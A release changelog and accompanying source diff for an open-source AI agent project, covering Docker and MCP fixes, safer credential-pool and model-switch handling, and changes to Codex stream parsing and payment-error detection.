- **MCP bare command resolution under Docker** — MCP servers configured with bare commands (`npx`, `npm`, `node`) now resolve against `/usr/local/bin` so they actually launch inside the Docker image where those binaries live. v0.15.0 left these failing silently in containers when the agent's effective PATH didn't include the Node toolchain location. ([#34186](https://github.com/NousResearch/hermes-agent/pull/34186) — @benbarclay)
- **Skills page sidebar / source pills restored** — A stale `useMemo` dependency in the new dashboard skills page collapsed the source pills and category sidebar to "All" only. Fixed; both surfaces now reflect the live catalog state. ([#34194](https://github.com/NousResearch/hermes-agent/pull/34194))
- **Kanban worker can be killed again** — `SIGTERM` on a kanban worker was being absorbed by an intermediate process and the worker stayed running. Closes [#28181](https://github.com/NousResearch/hermes-agent/issues/28181). ([#34045](https://github.com/NousResearch/hermes-agent/pull/34045))
- **Full skills.sh catalog (858 → 19,932 entries)** — The skills hub page was pulling a partial paginated catalog. The fetch now walks the sitemap, so all 19,932 skills.sh entries surface in the picker instead of just the first 858. ([#34025](https://github.com/NousResearch/hermes-agent/pull/34025))
---
## 🐛 Bug Fixes
### Dashboard / Web
- **`/api/auth/me` 401 no longer triggers reload loop** in loopback mode — ([#30698](https://github.com/NousResearch/hermes-agent/pull/30698) — @austinpickett)
- **Skills page source pills + category sidebar restored** — stale `useMemo` dep ([#34194](https://github.com/NousResearch/hermes-agent/pull/34194))
### Docker
- **`--insecure` is now explicit opt-in via env var**, not derived from bind host ([#34188](https://github.com/NousResearch/hermes-agent/pull/34188) — @benbarclay)
- **Dashboard test suite repaired** to match the insecure-opt-in fix ([#34204](https://github.com/NousResearch/hermes-agent/pull/34204) — @benbarclay)
- **arm64 PR builds skip the GHA cache** to avoid cache-thrash on cross-arch builders ([#33704](https://github.com/NousResearch/hermes-agent/pull/33704) — @BROCCOLO1D)
### MCP
- **Bare `npx`/`npm`/`node` resolve against `/usr/local/bin`** for Docker compatibility ([#34186](https://github.com/NousResearch/hermes-agent/pull/34186) — @benbarclay)
### Kanban
- **Worker SIGTERM actually terminates the process** ([#34045](https://github.com/NousResearch/hermes-agent/pull/34045))
- **Workers receive images referenced in task bodies** for vision-capable models ([#34210](https://github.com/NousResearch/hermes-agent/pull/34210))
### Gateway
- **`.md` files deliver again** — media-delivery validation defaults to denylist-only instead of an overly-narrow allowlist ([#34022](https://github.com/NousResearch/hermes-agent/pull/34022))
- **Probe stepdown safety** — on a context-overflow without an explicit provider context limit, the agent no longer steps down to a smaller model based on an unknown ceiling (salvage of [#33673](https://github.com/NousResearch/hermes-agent/pull/33673)) ([#33826](https://github.com/NousResearch/hermes-agent/pull/33826))
### CLI
- **`/yolo` mid-session enables the per-session bypass** instead of just toggling the env var (which the running agent had already snapshotted) ([#33931](https://github.com/NousResearch/hermes-agent/pull/33931) — @kshitijk4poor)
- **`/model` and `hermes model` show the same list**, plus disk cache for picker startup ([#33867](https://github.com/NousResearch/hermes-agent/pull/33867))
### Skills
- **Full skills.sh catalog via sitemap** — 858 → 19,932 entries ([#34025](https://github.com/NousResearch/hermes-agent/pull/34025))
### Redaction
- **Web URLs pass through unchanged** — the redactor was eating query parameters that looked credential-shaped ([#34029](https://github.com/NousResearch/hermes-agent/pull/34029))
---
## ✨ Small Features
- **Hindsight default narrowed to observation-only** for `recall_types` — tool path is also narrowed ([#34079](https://github.com/NousResearch/hermes-agent/pull/34079) — @nicoloboschi, follow-up [#34091](https://github.com/NousResearch/hermes-agent/pull/4df62d239e38bf8c212a595721c9c01e176f6c3a) — @kshitijk4poor)
- **Memory providers receive completed-turn message context** — salvage of [#28065](https://github.com/NousResearch/hermes-agent/pull/28065) ([#34097](https://github.com/NousResearch/hermes-agent/pull/34097) — @kshitijk4poor, credit to @devwdave)
---
## 📚 Documentation
- **`--no-supervise` / `HERMES_GATEWAY_NO_SUPERVISE` documented** in the reference docs (follow-up to [#33583](https://github.com/NousResearch/hermes-agent/pull/33583)) ([#33751](https://github.com/NousResearch/hermes-agent/pull/33751) — @r266-tech)
---
## 🛠️ Infrastructure
- **Vercel deploy workflow accepts `workflow_dispatch`** so docs deploys can be manually triggered ([#34081](https://github.com/NousResearch/hermes-agent/pull/34081))
- **`@nous-research/ui` bumped to 0.18.2** (Nix `npmDepsHash` also updated to match) ([#34193](https://github.com/NousResearch/hermes-agent/pull/34193) follow-ups — @austinpickett)
---
## 👥 Contributors
### Core
- @teknium1
### Community
- @austinpickett — dashboard 401 reload-loop fix (the headline), `@nous-research/ui` bump, Nix `npmDepsHash` updates
- @benbarclay — Docker `--insecure` opt-in, MCP bare-command resolution, dashboard test repair
- @kshitijk4poor`/yolo` session bypass, completed-turn memory context salvage, hindsight follow-up docs
- @nicoloboschi — hindsight `recall_types` observation default
- @BROCCOLO1D — arm64 PR build cache fix
- @r266-tech — `--no-supervise` reference docs
- @yangguangjin — probe stepdown safety (salvage of @yanghd's #33673)
- @devwdave — completed-turn memory context (credited via salvage)
- @andrewhosf — co-author
### Issue Reporters (the 401 loop)
- @routesmith ([#34206](https://github.com/NousResearch/hermes-agent/issues/34206))
- @beeaton ([#34202](https://github.com/NousResearch/hermes-agent/issues/34202))
---
**Full Changelog**: [v2026.5.28...v2026.5.29](https://github.com/NousResearch/hermes-agent/compare/v2026.5.28...v2026.5.29)
+2 -2
View File
@@ -1,7 +1,7 @@
{
"id": "hermes-agent",
"name": "Hermes Agent",
"version": "0.14.0",
"version": "0.15.1",
"description": "Self-improving open-source AI agent by Nous Research with ACP editor integration, persistent memory, skills, and rich tool support.",
"repository": "https://github.com/NousResearch/hermes-agent",
"website": "https://hermes-agent.nousresearch.com/docs/user-guide/features/acp",
@@ -9,7 +9,7 @@
"license": "MIT",
"distribution": {
"uvx": {
"package": "hermes-agent[acp]==0.14.0",
"package": "hermes-agent[acp]==0.15.1",
"args": ["hermes-acp"]
}
}
+2
View File
@@ -4,3 +4,5 @@ These modules contain pure utility functions and self-contained classes
that were previously embedded in the 3,600-line run_agent.py. Extracting
them makes run_agent.py focused on the AIAgent orchestrator class.
"""
from . import jiter_preload as _jiter_preload # noqa: F401
+14 -2
View File
@@ -183,6 +183,7 @@ def init_agent(
prefill_messages: List[Dict[str, Any]] = None,
platform: str = None,
user_id: str = None,
user_id_alt: str = None,
user_name: str = None,
chat_id: str = None,
chat_name: str = None,
@@ -265,6 +266,7 @@ def init_agent(
agent.ephemeral_system_prompt = ephemeral_system_prompt
agent.platform = platform # "cli", "telegram", "discord", "whatsapp", etc.
agent._user_id = user_id # Platform user identifier (gateway sessions)
agent._user_id_alt = user_id_alt # Optional stable alternate platform identifier
agent._user_name = user_name
agent._chat_id = chat_id
agent._chat_name = chat_name
@@ -736,8 +738,8 @@ def init_agent(
client_kwargs["default_headers"] = _codex_cloudflare_headers(api_key)
elif "default_headers" not in client_kwargs:
# Fall back to profile.default_headers for providers that
# declare custom headers (e.g. Vercel AI Gateway attribution,
# Kimi User-Agent on non-kimi.com endpoints).
# declare custom headers (e.g. Kimi User-Agent on non-kimi.com
# endpoints).
try:
from providers import get_provider_profile as _gpf
_ph = _gpf(agent.provider)
@@ -1005,6 +1007,13 @@ def init_agent(
# Track conversation messages for session logging
agent._session_messages: List[Dict[str, Any]] = []
# Responses encrypted reasoning replay state. Some OpenAI-compatible
# routes accept GPT-5 Responses requests but later reject replayed
# encrypted reasoning blobs (HTTP 400 ``invalid_encrypted_content``).
# When that happens we disable replay for the rest of the session and
# fall back to stateless continuity. See
# agent/conversation_loop.py's invalid_encrypted_content retry branch.
agent._codex_reasoning_replay_enabled = True
agent._memory_write_origin = "assistant_tool"
agent._memory_write_context = "foreground"
@@ -1112,6 +1121,8 @@ def init_agent(
# Thread gateway user identity for per-user memory scoping
if agent._user_id:
_init_kwargs["user_id"] = agent._user_id
if agent._user_id_alt:
_init_kwargs["user_id_alt"] = agent._user_id_alt
if agent._user_name:
_init_kwargs["user_name"] = agent._user_name
if agent._chat_id:
@@ -1511,6 +1522,7 @@ def init_agent(
platform=agent.platform or "cli",
model=agent.model,
context_length=getattr(agent.context_compressor, "context_length", 0),
conversation_id=getattr(agent, "_gateway_session_key", None),
)
except Exception as _ce_err:
_ra().logger.debug("Context engine on_session_start: %s", _ce_err)
+168 -72
View File
@@ -560,6 +560,24 @@ def recover_with_credential_pool(
if pool is None:
return False, has_retried_429
# Defensive guard: if a fallback provider is active and its provider name
# doesn't match the pool's provider, the pool belongs to the PRIMARY
# provider. Mutating it based on fallback errors would corrupt the
# primary's credential state (see #33088) and, via _swap_credential,
# overwrite the agent's base_url back to the primary's endpoint — every
# subsequent request then goes to the wrong host and 404s (see #33163).
# The pool should only act when the agent is still on the same provider
# that seeded the pool.
current_provider = (getattr(agent, "provider", "") or "").strip().lower()
pool_provider = (getattr(pool, "provider", "") or "").strip().lower()
if current_provider and pool_provider and current_provider != pool_provider:
_ra().logger.warning(
"Credential pool provider mismatch: pool=%s, agent=%s"
"skipping pool mutation to avoid cross-provider contamination",
pool_provider, current_provider,
)
return False, has_retried_429
effective_reason = classified_reason
if effective_reason is None:
if status_code == 402:
@@ -1361,81 +1379,129 @@ def switch_model(agent, new_model, new_provider, api_key='', base_url='', api_mo
old_model = agent.model
old_provider = agent.provider
# Clear the per-config context_length override so the new model's
# actual context window is resolved via get_model_context_length()
# instead of inheriting the stale value from the previous model.
agent._config_context_length = None
# ── Swap core runtime fields ──
agent.model = new_model
agent.provider = new_provider
# Use new base_url when provided; only fall back to current when the
# new provider genuinely has no endpoint (e.g. native SDK providers).
# Without this guard the old provider's URL (e.g. Ollama's localhost
# address) would persist silently after switching to a cloud provider
# that returns an empty base_url string.
if base_url:
agent.base_url = base_url
agent.api_mode = api_mode
# Invalidate transport cache — new api_mode may need a different transport
if hasattr(agent, "_transport_cache"):
agent._transport_cache.clear()
if api_key:
agent.api_key = api_key
# ── Build new client ──
if api_mode == "anthropic_messages":
from agent.anthropic_adapter import (
build_anthropic_client,
resolve_anthropic_token,
_is_oauth_token,
# ── Snapshot all fields the swap+rebuild can mutate ──
# If the rebuild raises (bad API key, network error, build_anthropic_client
# failure, etc.) we restore these atomically so the agent isn't left with a
# new model/provider name paired with the OLD client — that mismatch causes
# HTTP 400s like "claude-sonnet-4-6 is not supported on openai-codex" on the
# next turn. Callers in cli.py / gateway/run.py / tui_gateway/server.py
# catch the re-raised exception and show the user a warning; without this
# rollback the warning is misleading because the swap partially succeeded.
# Use a sentinel so we can distinguish "attribute was unset" from
# "attribute was None" and skip the restore for genuinely-missing
# attributes (tests construct bare agents via __new__ without all fields).
_MISSING = object()
_snapshot = {
name: getattr(agent, name, _MISSING)
for name in (
"model",
"provider",
"base_url",
"api_mode",
"api_key",
"client",
"_anthropic_client",
"_anthropic_api_key",
"_anthropic_base_url",
"_is_anthropic_oauth",
"_config_context_length",
)
# Only fall back to ANTHROPIC_TOKEN when the provider is actually Anthropic.
# Other anthropic_messages providers (MiniMax, Alibaba, etc.) must use their own
# API key — falling back would send Anthropic credentials to third-party endpoints.
_is_native_anthropic = new_provider == "anthropic"
effective_key = (api_key or agent.api_key or resolve_anthropic_token() or "") if _is_native_anthropic else (api_key or agent.api_key or "")
}
# _client_kwargs is a dict — snapshot a shallow copy so mutating the
# live dict doesn't poison the rollback target.
_snapshot["_client_kwargs"] = dict(getattr(agent, "_client_kwargs", {}) or {})
# MiniMax OAuth: swap static string for a per-request callable token
# provider so the rebuilt client survives 15-min token expiry. See
# the matching block in agent_init.py for the full rationale.
if new_provider == "minimax-oauth" and isinstance(effective_key, str) and effective_key:
try:
# Clear the per-config context_length override so the new model's
# actual context window is resolved via get_model_context_length()
# instead of inheriting the stale value from the previous model.
agent._config_context_length = None
# ── Swap core runtime fields ──
agent.model = new_model
agent.provider = new_provider
# Use new base_url when provided; only fall back to current when the
# new provider genuinely has no endpoint (e.g. native SDK providers).
# Without this guard the old provider's URL (e.g. Ollama's localhost
# address) would persist silently after switching to a cloud provider
# that returns an empty base_url string.
if base_url:
agent.base_url = base_url
agent.api_mode = api_mode
# Invalidate transport cache — new api_mode may need a different transport
if hasattr(agent, "_transport_cache"):
agent._transport_cache.clear()
if api_key:
agent.api_key = api_key
# ── Build new client ──
if api_mode == "anthropic_messages":
from agent.anthropic_adapter import (
build_anthropic_client,
resolve_anthropic_token,
_is_oauth_token,
)
# Only fall back to ANTHROPIC_TOKEN when the provider is actually Anthropic.
# Other anthropic_messages providers (MiniMax, Alibaba, etc.) must use their own
# API key — falling back would send Anthropic credentials to third-party endpoints.
_is_native_anthropic = new_provider == "anthropic"
effective_key = (api_key or agent.api_key or resolve_anthropic_token() or "") if _is_native_anthropic else (api_key or agent.api_key or "")
# MiniMax OAuth: swap static string for a per-request callable token
# provider so the rebuilt client survives 15-min token expiry. See
# the matching block in agent_init.py for the full rationale.
if new_provider == "minimax-oauth" and isinstance(effective_key, str) and effective_key:
try:
from hermes_cli.auth import build_minimax_oauth_token_provider
effective_key = build_minimax_oauth_token_provider()
except Exception as _mm_exc: # noqa: BLE001
import logging as _logging
_logging.getLogger(__name__).warning(
"MiniMax OAuth: failed to install per-request token provider "
"on switch (%s); using static bearer.",
_mm_exc,
)
agent.api_key = effective_key
agent._anthropic_api_key = effective_key
agent._anthropic_base_url = base_url or getattr(agent, "_anthropic_base_url", None)
agent._anthropic_client = build_anthropic_client(
effective_key, agent._anthropic_base_url,
timeout=get_provider_request_timeout(agent.provider, agent.model),
)
agent._is_anthropic_oauth = _is_oauth_token(effective_key) if (_is_native_anthropic and isinstance(effective_key, str)) else False
agent.client = None
agent._client_kwargs = {}
else:
effective_key = api_key or agent.api_key
effective_base = base_url or agent.base_url
agent._client_kwargs = {
"api_key": effective_key,
"base_url": effective_base,
}
_sm_timeout = get_provider_request_timeout(agent.provider, agent.model)
if _sm_timeout is not None:
agent._client_kwargs["timeout"] = _sm_timeout
agent.client = agent._create_openai_client(
dict(agent._client_kwargs),
reason="switch_model",
shared=True,
)
except Exception:
# Rollback every mutated field to the pre-swap snapshot so the agent
# is left consistent (old model + old provider + old client) and the
# caller's exception handler can surface a meaningful warning. The
# exception is re-raised; cli.py / gateway/run.py / tui_gateway catch
# it and print "Agent swap failed; change applied to next session".
for _name, _value in _snapshot.items():
if _value is _MISSING:
# Attribute did not exist before the swap — don't fabricate it.
continue
try:
from hermes_cli.auth import build_minimax_oauth_token_provider
effective_key = build_minimax_oauth_token_provider()
except Exception as _mm_exc: # noqa: BLE001
import logging as _logging
_logging.getLogger(__name__).warning(
"MiniMax OAuth: failed to install per-request token provider "
"on switch (%s); using static bearer.",
_mm_exc,
)
agent.api_key = effective_key
agent._anthropic_api_key = effective_key
agent._anthropic_base_url = base_url or getattr(agent, "_anthropic_base_url", None)
agent._anthropic_client = build_anthropic_client(
effective_key, agent._anthropic_base_url,
timeout=get_provider_request_timeout(agent.provider, agent.model),
)
agent._is_anthropic_oauth = _is_oauth_token(effective_key) if (_is_native_anthropic and isinstance(effective_key, str)) else False
agent.client = None
agent._client_kwargs = {}
else:
effective_key = api_key or agent.api_key
effective_base = base_url or agent.base_url
agent._client_kwargs = {
"api_key": effective_key,
"base_url": effective_base,
}
_sm_timeout = get_provider_request_timeout(agent.provider, agent.model)
if _sm_timeout is not None:
agent._client_kwargs["timeout"] = _sm_timeout
agent.client = agent._create_openai_client(
dict(agent._client_kwargs),
reason="switch_model",
shared=True,
)
setattr(agent, _name, _value)
except Exception: # noqa: BLE001
pass
raise
# ── Re-evaluate prompt caching ──
agent._use_prompt_caching, agent._use_native_cache_layout = (
@@ -1928,6 +1994,36 @@ def copy_reasoning_content_for_api(agent, source_msg: dict, api_msg: dict) -> No
api_msg.pop("reasoning_content", None)
def reapply_reasoning_echo_for_provider(agent, api_messages: list) -> int:
"""Re-pad assistant turns with reasoning_content for the active provider.
``api_messages`` is built once, before the retry loop, while the *primary*
provider is active. If a mid-conversation fallback then switches to a
require-side provider (DeepSeek / Kimi / MiMo thinking mode), assistant
turns that were built when the prior provider did NOT need the echo-back go
out without ``reasoning_content`` and the new provider rejects them with
HTTP 400 ("The reasoning_content in the thinking mode must be passed back").
Calling this immediately before building the request kwargs re-applies the
pad against the *current* provider. It is idempotent and a no-op unless
``_needs_thinking_reasoning_pad()`` is True for the active provider, so it
is safe to call every iteration and covers every fallback path.
Returns the number of assistant turns that gained reasoning_content.
"""
if not agent._needs_thinking_reasoning_pad():
return 0
padded = 0
for api_msg in api_messages:
if api_msg.get("role") != "assistant":
continue
if api_msg.get("reasoning_content"):
continue
copy_reasoning_content_for_api(agent, api_msg, api_msg)
if api_msg.get("reasoning_content"):
padded += 1
return padded
def _iter_pool_sockets(client: Any):
"""Yield raw sockets reachable from an OpenAI/httpx client pool.
+5 -3
View File
@@ -77,16 +77,16 @@ ADAPTIVE_EFFORT_MAP = {
# xhigh as a distinct level between high and max; older adaptive-thinking
# models (4.6) reject it with a 400. Keep this substring list in sync with
# the Anthropic migration guide as new model families ship.
_XHIGH_EFFORT_SUBSTRINGS = ("4-7", "4.7")
_XHIGH_EFFORT_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")
# Models where extended thinking is deprecated/removed (4.6+ behavior: adaptive
# is the only supported mode; 4.7 additionally forbids manual thinking entirely
# and drops temperature/top_p/top_k).
_ADAPTIVE_THINKING_SUBSTRINGS = ("4-6", "4.6", "4-7", "4.7")
_ADAPTIVE_THINKING_SUBSTRINGS = ("4-6", "4.6", "4-7", "4.7", "4-8", "4.8")
# Models where temperature/top_p/top_k return 400 if set to non-default values.
# This is the Opus 4.7 contract; future 4.x+ models are expected to follow it.
_NO_SAMPLING_PARAMS_SUBSTRINGS = ("4-7", "4.7")
_NO_SAMPLING_PARAMS_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")
_FAST_MODE_SUPPORTED_SUBSTRINGS = ("opus-4-6", "opus-4.6")
# ── Max output token limits per Anthropic model ───────────────────────
@@ -94,6 +94,8 @@ _FAST_MODE_SUPPORTED_SUBSTRINGS = ("opus-4-6", "opus-4.6")
# max_tokens as a mandatory field. Previously we hardcoded 16384, which
# starves thinking-enabled models (thinking tokens count toward the limit).
_ANTHROPIC_OUTPUT_LIMITS = {
# Claude 4.8
"claude-opus-4-8": 128_000,
# Claude 4.7
"claude-opus-4-7": 128_000,
# Claude 4.6
+137 -63
View File
@@ -269,7 +269,6 @@ _API_KEY_PROVIDER_AUX_MODELS_FALLBACK: Dict[str, str] = {
"minimax-oauth": "MiniMax-M2.7-highspeed",
"minimax-cn": "MiniMax-M2.7",
"anthropic": "claude-haiku-4-5-20251001",
"ai-gateway": "google/gemini-3-flash",
"opencode-zen": "gemini-3-flash",
"opencode-go": "glm-5",
"kilocode": "google/gemini-3-flash-preview",
@@ -384,15 +383,6 @@ def build_nvidia_nim_headers(base_url: str | None) -> dict:
return {}
# Vercel AI Gateway app attribution headers. HTTP-Referer maps to
# referrerUrl and X-Title maps to appName in the gateway's analytics.
from hermes_cli import __version__ as _HERMES_VERSION
_AI_GATEWAY_HEADERS = {
"HTTP-Referer": "https://hermes-agent.nousresearch.com",
"X-Title": "Hermes Agent",
"User-Agent": f"HermesAgent/{_HERMES_VERSION}",
}
# Nous Portal extra_body for product attribution.
# Callers should pass this as extra_body in chat.completions.create()
@@ -785,67 +775,60 @@ class _CodexCompletionsAdapter:
pass
try:
# Collect output items and text deltas during streaming —
# the Codex backend can return empty response.output from
# get_final_response() even when items were streamed.
collected_output_items: List[Any] = []
collected_text_deltas: List[str] = []
has_function_calls = False
if total_timeout:
timeout_timer = threading.Timer(float(total_timeout), _close_client_on_timeout)
timeout_timer.daemon = True
timeout_timer.start()
_check_cancelled()
with self._client.responses.stream(**resp_kwargs) as stream:
for _event in stream:
_check_cancelled()
_etype = getattr(_event, "type", "")
if _etype == "response.output_item.done":
_done = getattr(_event, "item", None)
if _done is not None:
collected_output_items.append(_done)
elif "output_text.delta" in _etype:
_delta = getattr(_event, "delta", "")
if _delta:
collected_text_deltas.append(_delta)
elif "function_call" in _etype:
has_function_calls = True
_check_cancelled()
final = stream.get_final_response()
# Backfill empty output from collected stream events
_output = getattr(final, "output", None)
if isinstance(_output, list) and not _output:
if collected_output_items:
final.output = list(collected_output_items)
logger.debug(
"Codex auxiliary: backfilled %d output items from stream events",
len(collected_output_items),
)
elif collected_text_deltas and not has_function_calls:
# Only synthesize text when no tool calls were streamed —
# a function_call response with incidental text should not
# be collapsed into a plain-text message.
assembled = "".join(collected_text_deltas)
final.output = [SimpleNamespace(
type="message", role="assistant", status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex auxiliary: synthesized from %d deltas (%d chars)",
len(collected_text_deltas), len(assembled),
)
# Event-driven Responses streaming via the low-level
# ``responses.create(stream=True)`` path. The high-level
# ``responses.stream(...)`` helper does post-hoc typed
# reconstruction from ``response.completed.response.output``,
# which the chatgpt.com Codex backend has been observed to
# return as ``null`` (gpt-5.5, May 2026) — that crashes the SDK
# with ``TypeError: 'NoneType' object is not iterable``.
# Consuming raw events and assembling the final response
# ourselves from ``response.output_item.done`` makes us
# structurally immune to that drift.
from agent.codex_runtime import _consume_codex_event_stream
stream_kwargs = dict(resp_kwargs)
stream_kwargs["stream"] = True
def _on_each_event(_event: Any) -> None:
# Re-check timeout/cancellation per event, matching the
# cadence the old in-line ``_check_cancelled()`` used.
_check_cancelled()
event_stream = self._client.responses.create(**stream_kwargs)
try:
final = _consume_codex_event_stream(
event_stream,
model=resp_kwargs.get("model"),
on_event=_on_each_event,
)
finally:
close_fn = getattr(event_stream, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
if final is None:
raise RuntimeError("Codex auxiliary Responses stream did not return a final response")
# Extract text and tool calls from the Responses output.
# Items may be SDK objects (attrs) or dicts (raw/fallback paths),
# so use a helper that handles both shapes.
# Items may be SimpleNamespace (raw-event path) or dicts
# (some legacy fallback paths), so handle both shapes.
def _item_get(obj: Any, key: str, default: Any = None) -> Any:
val = getattr(obj, key, None)
if val is None and isinstance(obj, dict):
val = obj.get(key, default)
return val if val is not None else default
for item in getattr(final, "output", []):
for item in (getattr(final, "output", None) or []):
item_type = _item_get(item, "type")
if item_type == "message":
for part in (_item_get(item, "content") or []):
@@ -865,9 +848,12 @@ class _CodexCompletionsAdapter:
resp_usage = getattr(final, "usage", None)
if resp_usage:
usage = SimpleNamespace(
prompt_tokens=getattr(resp_usage, "input_tokens", 0),
completion_tokens=getattr(resp_usage, "output_tokens", 0),
total_tokens=getattr(resp_usage, "total_tokens", 0),
prompt_tokens=getattr(resp_usage, "input_tokens", 0)
or (resp_usage.get("input_tokens", 0) if isinstance(resp_usage, dict) else 0),
completion_tokens=getattr(resp_usage, "output_tokens", 0)
or (resp_usage.get("output_tokens", 0) if isinstance(resp_usage, dict) else 0),
total_tokens=getattr(resp_usage, "total_tokens", 0)
or (resp_usage.get("total_tokens", 0) if isinstance(resp_usage, dict) else 0),
)
except Exception as exc:
if timed_out.is_set():
@@ -2258,11 +2244,15 @@ def _is_payment_error(exc: Exception) -> bool:
# but sometimes wrap them in 429 or other codes.
# Daily quota exhaustion from Bedrock, Vertex AI, and similar providers
# uses different language but is semantically identical to credit exhaustion.
if status in {402, 429, None}:
if status in {402, 404, 429, None}:
if any(kw in err_lower for kw in (
"credits", "insufficient funds",
"can only afford", "billing",
"payment required",
"out of funds", "run out of funds",
"balance_depleted", "no usable credits",
"model_not_supported_on_free_tier",
"not available on the free tier",
# Daily / monthly / weekly quota exhaustion keywords
"quota exceeded", "quota_exceeded",
"too many tokens per day", "daily limit",
@@ -2274,6 +2264,18 @@ def _is_payment_error(exc: Exception) -> bool:
return False
def _nous_portal_account_has_fresh_paid_access() -> bool:
"""Return True only when the fresh Nous account API says paid access is allowed."""
try:
from hermes_cli.nous_account import get_nous_portal_account_info
account_info = get_nous_portal_account_info(force_fresh=True)
return account_info.paid_service_access is True
except Exception as exc:
logger.debug("Auxiliary Nous paid-entitlement refresh check failed: %s", exc)
return False
def _is_rate_limit_error(exc: Exception) -> bool:
"""Detect rate-limit errors that warrant provider fallback.
@@ -2302,6 +2304,10 @@ def _is_rate_limit_error(exc: Exception) -> bool:
if not any(kw in err_lower for kw in (
"credits", "insufficient funds", "billing",
"payment required", "can only afford",
"out of funds", "run out of funds",
"balance_depleted", "no usable credits",
"model_not_supported_on_free_tier",
"not available on the free tier",
)):
return True
return False
@@ -3613,8 +3619,7 @@ def resolve_provider_client(
else:
# Fall back to profile.default_headers for providers that declare
# client-level attribution headers on their profile (e.g. GMI
# User-Agent for traffic identification, Vercel AI Gateway
# Referer/Title for analytics).
# User-Agent for traffic identification).
try:
from providers import get_provider_profile as _gpf_main
_ph_main = _gpf_main(provider)
@@ -4952,6 +4957,41 @@ def call_llm(
resolved_provider == "nous"
or base_url_host_matches(_base_info, "inference-api.nousresearch.com")
)
if (
_is_payment_error(first_err)
and client_is_nous
and _nous_portal_account_has_fresh_paid_access()
):
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
model=final_model,
async_mode=False,
base_url=resolved_base_url,
api_key=resolved_api_key,
api_mode=resolved_api_mode,
main_runtime=main_runtime,
is_vision=(task == "vision"),
)
if refreshed_client is not None:
logger.info(
"Auxiliary %s: refreshed Nous runtime credentials after paid account check, retrying",
task or "call",
)
if refreshed_model and refreshed_model != kwargs.get("model"):
kwargs["model"] = refreshed_model
try:
return _validate_llm_response(
refreshed_client.chat.completions.create(**kwargs), task)
except Exception as retry_err:
if not (
_is_auth_error(retry_err)
or _is_payment_error(retry_err)
or _is_connection_error(retry_err)
or _is_rate_limit_error(retry_err)
):
raise
first_err = retry_err
if _is_auth_error(first_err) and client_is_nous:
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
@@ -5354,6 +5394,40 @@ async def async_call_llm(
resolved_provider == "nous"
or base_url_host_matches(_client_base, "inference-api.nousresearch.com")
)
if (
_is_payment_error(first_err)
and client_is_nous
and _nous_portal_account_has_fresh_paid_access()
):
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
model=final_model,
async_mode=True,
base_url=resolved_base_url,
api_key=resolved_api_key,
api_mode=resolved_api_mode,
is_vision=(task == "vision"),
)
if refreshed_client is not None:
logger.info(
"Auxiliary %s (async): refreshed Nous runtime credentials after paid account check, retrying",
task or "call",
)
if refreshed_model and refreshed_model != kwargs.get("model"):
kwargs["model"] = refreshed_model
try:
return _validate_llm_response(
await refreshed_client.chat.completions.create(**kwargs), task)
except Exception as retry_err:
if not (
_is_auth_error(retry_err)
or _is_payment_error(retry_err)
or _is_connection_error(retry_err)
or _is_rate_limit_error(retry_err)
):
raise
first_err = retry_err
if _is_auth_error(first_err) and client_is_nous:
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
+5 -1
View File
@@ -483,6 +483,11 @@ def _run_review_in_thread(
finally:
clear_thread_tool_whitelist()
# Snapshot review actions before teardown. close() is allowed to
# clean per-session state, but the user-visible self-improvement
# summary still needs the completed review agent's tool results.
review_messages = list(getattr(review_agent, "_session_messages", []))
# Tear down memory providers while stdout is still
# redirected so background thread teardown (Honcho flush,
# Hindsight sync, etc.) stays silent. The finally block
@@ -495,7 +500,6 @@ def _run_review_in_thread(
review_agent.close()
except Exception:
pass
review_messages = list(getattr(review_agent, "_session_messages", []))
review_agent = None
# Scan the review agent's messages for successful tool actions
+183 -27
View File
@@ -129,6 +129,24 @@ def estimate_request_context_tokens(api_payload: Any) -> int:
return _chars(api_payload) // 4
def _is_openai_codex_backend(agent) -> bool:
base_url_lower = str(getattr(agent, "_base_url_lower", "") or "")
base_url_hostname = str(getattr(agent, "_base_url_hostname", "") or "")
return (
getattr(agent, "provider", None) == "openai-codex"
or (
base_url_hostname == "chatgpt.com"
and "/backend-api/codex" in base_url_lower
)
)
def _env_float(name: str, default: float) -> float:
try:
return float(os.getenv(name, str(default)))
except (TypeError, ValueError):
return default
def interruptible_api_call(agent, api_kwargs: dict):
"""
@@ -256,32 +274,89 @@ def interruptible_api_call(agent, api_kwargs: dict):
# apply richer recovery (credential rotation, provider fallback).
_stale_timeout = agent._compute_non_stream_stale_timeout(api_kwargs)
# ── Time-to-first-byte (TTFB) watchdog for the Codex Responses stream ──
# ── Codex Responses stream watchdogs ────────────────────────────────
# The chatgpt.com/backend-api/codex endpoint has an intermittent failure
# mode where it accepts the connection but never emits a single stream
# event (observed directly: 0 events, no HTTP status, the socket just
# hangs). A fresh reconnect succeeds in ~2s, but the wall-clock stale
# timeout (often 180900s) makes us wait minutes before retrying. While no
# stream event has arrived yet we apply a much shorter TTFB cutoff so the
# main retry loop can reconnect promptly. Once the first event arrives the
# stream is healthy, so we fall back to the wall-clock stale timeout and
# never interrupt a legitimate long generation. Gated to codex_responses:
# only that path streams events incrementally (the chat_completions
# non-stream, anthropic and bedrock branches here have no first-event
# signal). The marker advances on *any* event (see codex_runtime), so
# reasoning-only / tool-call-only turns are not mistaken for a stall.
# Operators can tune via HERMES_CODEX_TTFB_TIMEOUT_SECONDS (0 disables).
_ttfb_enabled = agent.api_mode == "codex_responses"
try:
_ttfb_timeout = float(os.getenv("HERMES_CODEX_TTFB_TIMEOUT_SECONDS", "45"))
except (TypeError, ValueError):
_ttfb_timeout = 45.0
# main retry loop can reconnect promptly. Large subscription-backed Codex
# requests can legitimately spend tens of seconds in backend admission /
# prompt prefill before the first SSE event, so the no-byte TTFB watchdog
# is disabled for large chatgpt.com/backend-api/codex requests. A second
# failure mode emits an opening SSE frame and then stalls forever in SSL
# read; for that we watch the gap since the last Codex stream event. This
# matches Codex CLI's stream_idle_timeout model: any valid SSE event is
# activity. Operators can tune via HERMES_CODEX_TTFB_TIMEOUT_SECONDS and
